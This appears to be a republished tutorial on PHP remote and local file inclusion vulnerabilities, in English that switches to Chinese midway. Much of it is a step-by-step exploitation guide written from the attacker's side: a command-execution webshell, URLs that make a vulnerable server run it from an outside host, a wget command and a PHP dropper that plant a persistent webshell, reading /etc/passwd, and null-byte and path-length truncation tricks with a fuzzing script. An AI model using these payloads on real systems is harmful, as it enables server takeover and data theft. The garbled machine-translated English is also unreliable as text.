1. What is a "remote file inclusion vulnerability"?
The answer is:
When the server uses the PHP feature (function) to include any file, because it needs to include The source of this file is not strictly filtered, so it can contain a malicious file, and we can construct this malicious file to achieve evil purposes.
Dangerous functions involved: include(), require() and include_once(), require_once()
Include: include and run Specify the file. When an error occurs when including an external file, the system will give a warning, but the entire php file will continue to execute.
Require: The only difference from include is that when an error occurs, include continues to run but require stops running.
Include_once: This function has almost the same effect as the include function, except that it checks whether the file has been imported before importing the function. If it has been executed once, it will not be executed again.
Require_once: The difference between this function and require is the same as include and include_once I mentioned above. So I won’t repeat it.
php.ini configuration file: allow_url_fopen=off means remote files cannot be included. Php4 exists remote & local, php5 only exists local inclusion.
# 2. Why include files?
When programmers write programs, they don’t like to do the same thing, nor do they like to write the same code (such as some common functions) several times, so they just write the ones that need to be shared. The code is written in a separate file, such as share.php, and then included and called in other files. In PHP, we use the functions listed above to achieve this purpose. Its workflow: If you want to include share.php in main.php, I will write include("share.php") like this The purpose is achieved, and then you can use the functions in share.php. There is no problem with hard-coding the file name that needs to be included, and there will be no loopholes. So where is the problem?
Sometimes you may not be sure which file needs to be included. For example, let’s take a look at the code of the following file index.php:
if ($_GET[page]) { include $_GET[page]; } else { include ”home.php”; }
A very normal piece of PHP code, how does it work? ?
The usage format of the above code may be like this:
//m.sbmmt.com/m4r10/php/index.php?page=main.php
or
//m.sbmmt.com/m4r10/php/index.php?page=downloads.php
Combined with the above code, let’s briefly talk about how Operation:
Submit the above URL and get the value of this page in index.php ($_GET[page]).
Determine whether $_GET[page] is empty. If it is not empty (here is main.php), use include to include this file.
If $_GET[page] is empty, execute else to include the file “home.php”.
#3. Why do loopholes occur?
You may want to say, this is great. You can dynamically include files according to the URL. How convenient is it? How did the vulnerability arise? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his links, we may want to write the file we want to include (call), for example, we will type in the following URL casually :http://hi.baidu.com/m4r10/php/index.php?page=hello.php. Then our index.php program foolishly follows the steps we mentioned above: take the page as hello.php, and then include (hello.php). At this time, the problem arises, because we do not have the file hello.php. , so it will report a warning when it is included, similar to the following information:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3 Warning: include() [function.include]: Failed opening ’hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3
Note that the Warning above cannot find the hello.php file we specified, that is, the file that does not include the path we specified; The later warning is because the specified file was not found previously, so a warning was issued when it was included.
4. How to use it?
As you can see above, problems have arisen, so how do we exploit such a vulnerability? There are actually many methods of exploitation, but they are essentially the same. I will mention three common ones here. How to use:
1. Including reading other files on the target machine
由前面我们可以看到,由于对取得的参数page没有过滤,于是我们可以任意指定目标主机上的其它敏感文件,例如在前面的警告中,我们可以看到暴露的绝对路径(vhost/wwwroot/php/),那么我们就可以多次探测来包含其它文件,比如指定URL为:http://hi.baidu.com /m4r10/php/index.php?page=./txt.txt可以读出当前路径下的txt.txt文件,也可以使用../../进行目录跳转 (在没过滤../的情况下);也可以直接指定绝对路径,读取敏感的系统文件,比如这个URL:http://hi.baidu.com/m4r10 /php/index.php?page=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动Apache的权限比较高,是可以读出 这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect.的Warning(这里是由于apache的open_basedir中限制了访问目录)。
2.远程文件包含可运行的PHP木马
如果目标主机的”allow_url_fopen”是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为 PHP格式就可以了)。
<?php if (get_magic_quotes_gpc()){ $_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符) ini_set(“max_execution_time”,0); //设定针对这个文件的执行时间,0为不限制. echo ”M4R10开始行”; //打印的返回的开始行提示信息 passthru($_REQUEST["cmd"]); //运行cmd指定的命令 echo ”M4R10结束行”; //打印的返回的结束行提示信息 ?>
以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在M4R10开始行与M4R10结束行之间。把这个文件 保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了:
//m.sbmmt.com/m4r10/php /index.php?page=http://www.xxx.cn/cmd.txt?cmd=ls
其中cmd后面的就是你需要执行的命令,其它常 用的命令(以*UNIX为例)如下:
ll 列目录、文件(相当于Windows下dir)
pwd 查看当前绝对路径
id whoami 查看当前用户
wget 下载指定URL的文件
等等其它的,你主机去BAIDU找吧,就不列举了。
3.包含一个创建文件的PHP文件(常用)
也许有的人认为还是得到目标机上的一个真实的Webshell比较放心,万一哪天人家发现这儿个包含漏洞修补了,我们就不能再远程包含得到上面的那 个” 伪”Webshell了,不是么?可以理解这个心态,我们继续。得到一个真实的Webshell,我们也说两种常见的方法:
1)使用wget之类的命令来下载一个Webshell
这个比较简单,也很常用,在上面我们得到的那个伪webshell中,我们可以执行命令,那么我们也可以调用系统中的一个很厉害的角色,wget, 这个命令的强大你可以google下,参数一大堆,绝对搞晕你,呵呵,我们不需要那么复杂,我们就使用一个 -O(–output- document=FILE,把文档写到FILE文件中) 就可以了,呵呵。
前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方,比 如:http://www.xxx.cn/m4r10.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中 执行如下的URL:
//m.sbmmt.com/m4r10/php/index.php?page=http://www.xxx.cn /cmd.txt?cmd=wget http://www.xxx.cn/m4r10.txt -O m4r10.php
如果当前目录可写,就能得到 一个叫做m4r10.php的Webshell了,如果当前目录不可写,还需要想其它的办法。
2)使用文件来创建
前面的wget可能会遇到当前目录不能写的情况;或者目标主机禁用了(或者没装)这个命令,我们又需要变通一下了,我们可以结合前面的包含文件漏洞来包含一个创建文件(写文件)的PHP脚本,内容如下:
<?php $f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流 $ff=fopen(“./upload/m4r10.php”,”a”); //寻找一个可以的目录,创建一个文件 fwrite ($ff,$f); //把前面打开的文件流写到创建的文件里 fclose($ff); //关闭保存文件 ?>
还是写入我们上面用wget下载的那个php文件,但是我们改进了方法,用PHP脚本来实现,可以使用上面的cmd.php?cmd=ll查找可以 写的目录,比如这里的upload,然后把文件创建在这个目录下:./upload/m4r10.php。然后就得到我们的Webshell了。
4.本地文件包含(常用)
典型的漏洞代码:
<?php include($_GET['pages'].‘.php’); ?>
黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
本地包含漏洞的利用(这里先忽略截断问题,下面会将截断的方法)
1、包含同服务器中上传的jpg、txt、rar等文件,这个是最理想的情况了。
2、包含系统的各种日志,如apache日志,文件系统日志等 其中apache当记录格式为combined,一般日志都会很大,基本无法包含成功。包含log是有自动化攻击程序的。
突破限制截断后面的字符串技巧
利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?
用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串(推测相对路径可用)
看漏洞代码:
<?php $webpath = dirname(__FILE__)."/"; $filepath = "test.txt"; for($i =1;$i<1000;$i++){ $filepath .= '.'; } include $webpath.$filepath.".php"; ?>
test.txt 代码
结果截断失败,改下代码:
<?php $webpath = dirname(__FILE__)."/"; $filepath = "test.txt"; for($i =1;$i<1000;$i++){ $filepath .= '.'; } include $filepath.".php"; //相对路径 ?>
这次成功。
以上是windows下的方法,其实linux也可以:
include截断
<?php include $_GET['action'].".php"; ?>
提交“action=/etc/passwd%00”中的“%00”将截断后面的“.php”,但是除了“%00”还有没有其他的字符可以实现截断使用呢?
肯定有人想到了远程包含的url里问号“?”的作用,通过提交“action=http://www.hacksite.com/evil-code.txt?”这里“?”实现了“伪截断”:),好象这个看上去不是那么舒服那么我们简单写个代码fuzz一下:
////var5.php代码: ////include $_GET['action'].".php"; ////print strlen(realpath("./"))+strlen($_GET['action']); /////////////////// ini_set('max_execution_time', 0); $str=''; for($i=0;$i<50000;$i++) { $str=$str."/"; $resp=file_get_contents('http://127.0.0.1/var/var5.php?action=1.txt'.$str); //1.txt里的代码为print 'hi'; if (strpos($resp, 'hi') !== false){ print $i; exit; } } ?>
经过测试字符“.”、“ /”或者2个字符的组合,在一定的长度时将被截断,win系统和*nix的系统长度不一样,当win下strlen(realpath("./"))+strlen($_GET['action'])的长度大于256时被截断,对于*nix的长度是4 * 1024 = 4096。对于php.ini里设置远程文件关闭的时候就可以利用上面的技巧包含本地文件了。(此漏洞由cloie#ph4nt0m.org最先发现])
推荐文章:
关于PHP文件包含一些漏洞分析。文章简单的分析了在php文件包含时inlcude的一个漏洞分析,下面希望对大家有点用处哦。
The above is the detailed content of PHP file contains detailed description. For more information, please follow other related articles on the PHP Chinese website!